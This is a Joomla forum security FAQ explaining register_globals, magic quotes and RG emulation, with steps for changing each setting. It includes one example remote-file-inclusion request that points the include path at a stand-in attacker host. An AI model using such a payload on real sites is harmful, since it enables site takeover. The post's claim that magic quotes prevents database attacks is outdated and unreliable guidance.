Please notice that this topic is locked. If you want to discuss it, go here.
Register Globals
What does it do?
The function register_globals helps lazy developers with coding their programs. It basically takes all values, that are passed over to the script and puts them into variables. This means that
Code: Select all
index.php?foo=bar
Why is this bad? The culprit with this functions is, that it does not check the value for anything harmfull. So if I want to overwrite the path Joomla! uses to include files, I could just pass this over to the script:
Code: Select all
index.php?mos_config_livesite=http://bad.hacker.tld
The function itself is not bad. If you check each variable before using its content, you are practically safe and this feature is helping you (as a developer). The problem is, that a lot of developers deliver sloppy work and don't check all their variables. In Joomla! its even simpler. For developers there is a function called mosGetParam(), that does (allmost) all the checking for you and its so easy to use. If all developers would use this function and not rely on register_globals, we would have very little security problems.
How can I turn register_globals off?
There are several ways how to turn off the function register_globals.
Apache/PHP configuration files outside of your website's folder
If you have access to the configuration files of your server, you can put
Code: Select all
register_globals = Off
.htaccess file
On most servers, you can configure the Apache with files with the name .htaccess. These files can not be read from the web! Often you can't just copy such a file on your webspace, but you can rename a file to .htaccess. To create this file, just open a text-editor like Notepad or on Linux vi (NOT Word!!) and insert the line
Code: Select all
php_flag register_globals off
php.ini
When the .htaccess file does not work, you can try to use a php.ini file. This is allmost the same, but the line has to be
Code: Select all
register_globals = off
If all of these measurements do not show any effect, you should contact your provider and tell them to turn it off for you.
If they refuse to do so, you should consider changing your hosting, since this is a basic (security) setting that has been around for years.
Magic Quotes
What does it do?
This function makes sure that all variables that are handed over to your database are getting escaped. This means that potential hacker attempts on your database through PHP scripts are prevented. This option should be turned ON!
How can I turn magic_quotes_gpc on?
Basically its the same as with register_globals, the only difference is, that you have to put the following line in your .htaccess:
Code: Select all
php_flag magic_quotes_gpc on
Code: Select all
magic_quotes_gpc = on
What does it do?
RG Emulation is an emulation of the function register_globals. It prevents a lot of security holes that come with the real register_globals and makes a lot of (sloppily coded) extensions work, although register_globals is turned off. But unfortunately it does not close all security holes and therefore, you should turn this feature off.
How can I turn rg_emulation off?
Open the file globals.php in your Joomla root folder and search for the following line:
Code: Select all
define( 'RG_EMULATION', 1 );
Is my site now secure?
No. There are several more ways a hacker can gain entry to your server. These three settings just close up the three biggest holes in your server. Security in general is never complete and this means, that you can only make it as hard as possible for potential hackers to gain entry to your site. To ensure more security, allways use the latest version of Joomla! and of all extensions you are using on your site. Further you should register yourself to the anouncenment board of Joomla! by clicking the Notify button and read the security forum.